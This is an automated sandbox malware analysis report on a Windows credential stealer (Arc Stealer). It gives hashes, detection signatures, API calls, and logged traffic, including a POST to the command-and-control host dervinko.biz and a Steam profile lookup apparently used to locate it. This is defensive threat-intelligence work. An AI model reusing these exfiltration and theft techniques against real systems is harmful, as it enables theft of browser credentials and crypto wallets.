Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gj8P0mbklo.exe

Overview

General Information

Sample name:Gj8P0mbklo.exe
renamed because original name is a hash value
Original sample name:f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835.exe
Analysis ID:1436772
MD5:bad3fa5127efcc9c678c5d71fce0d0b2
SHA1:c5f49dd54b71eaf4e1ba3a9fdfc51c7fb8afbea8
SHA256:f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835
Tags:ACRStealerexe
Infos:

Detection

Arc Stealer
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Arc Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Gj8P0mbklo.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Gj8P0mbklo.exe" MD5: BAD3FA5127EFCC9C678C5D71FCE0D0B2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: Gj8P0mbklo.exe PID: 6256JoeSecurity_ArcStealerYara detected Arc StealerJoe Security
      Process Memory Space: Gj8P0mbklo.exe PID: 6256JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Gj8P0mbklo.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: Gj8P0mbklo.exeReversingLabs: Detection: 57%
        Source: Gj8P0mbklo.exeVirustotal: Detection: 61%Perma Link
        Machine Learning detection for sample
        Source: Gj8P0mbklo.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00356F10 Concurrency::cancel_current_task,lstrlenA,GetProcessHeap,HeapAlloc,CryptUnprotectData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,0_2_00356F10
        Source: Gj8P0mbklo.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
        Source: unknownHTTPS traffic detected: 23.61.62.148:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.13.203:443 -> 192.168.2.6:49700 version: TLS 1.2
        Source: Gj8P0mbklo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_003701C0 FindFirstFileA,PathMatchSpecA,0_2_003701C0
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0035CE40 FindFirstFileA,FindNextFileA,Sleep,0_2_0035CE40
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_00389AFB FindFirstFileExW,0_2_00389AFB
        Source: Joe Sandbox ViewIP Address: 23.61.62.148 23.61.62.148
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\Gj8P0mbklo.exeCode function: 0_2_0036F560 InternetOpenUrlA,Sleep,InternetReadFile,InternetReadFile,0_2_0036F560
        Source: global trafficHTTP traffic detected: GET /profiles/76561199609719039 HTTP/1.1User-Agent: MyApp/1.0Host: steamcommunity.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /ujs/89737b57-777d-400d-bb7f-77b7e024920e HTTP/1.1User-Agent: MyApp/1.0Host: dervinko.bizCache-Control: no-cache
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: dervinko.biz
        Source: unknownHTTP traffic detected: POST /Up HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: MyApp/1.0Host: dervinko.bizContent-Length: 341Cache-Control: no-cache
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ABA&a
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=roSu8uqw
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=_Vry
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=KyfgrihL0xta&l=e
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
        Source: 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2098131315.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2098197482.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108525906.00000000050C8000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up
        Source: Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/b
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145448565.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/b/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/bAW
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2126302476.00000000050CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/bLocal
        Source: Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/b_
        Source: Gj8P0mbklo.exe, 00000000.00000003.2151712465.00000000050CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/bistAndAuditAlarmByHandle
        Source: Gj8P0mbklo.exe, 00000000.00000003.2145426350.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2145176778.00000000050CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/bistAndAuditAlarmByHandleerta
        Source: Gj8P0mbklo.exe, 00000000.00000003.2151751922.000000000509F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151712465.0000000005090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/Up/byDllc
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002794000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/nd-point:b
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/q
        Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.000000000274E000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dervinko.biz/ujs/89737b57-777d-400d-bb7f-77b7e024920e
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
        Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
